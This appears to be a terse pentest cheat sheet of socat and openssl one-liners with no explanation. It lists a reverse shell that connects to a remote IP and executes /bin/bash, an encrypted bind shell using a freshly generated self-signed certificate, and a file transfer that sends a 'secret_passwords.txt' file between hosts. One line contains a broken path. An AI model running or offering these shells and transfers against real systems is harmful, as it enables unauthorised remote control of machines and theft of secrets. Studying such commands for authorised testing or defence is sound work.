socat - TCP4:<remote server's ip address>:80
socat TCP4:10.11.0.22:443 EXEC:/bin/bash		//Reverse Shell
socat -d -d TCP4-LISTEN:443 STDOUT			//Reverse Shell

openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 30 -out bind_shell.crt
cat bind_shell.key bind_shell.crt > bind_shell.pem
sudo socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin /bash
socat - OPENSSL:192.168.22.31:443,verify=0 id

sudo socat TCP4-LISTEN:443,fork file:secret_passwords.txt		//File Transfer
socat TCP4:10.11.0.4:443 file:received_secret_passwords.txt,create	//File Transfer

#secure shell
openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 362 -out bind_shell.crt
cat bind_shell.key bind_shell.crt > bind_shell.pem
sudo socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash
socat - OPENSSL:10.11.0.4:443,verify=0
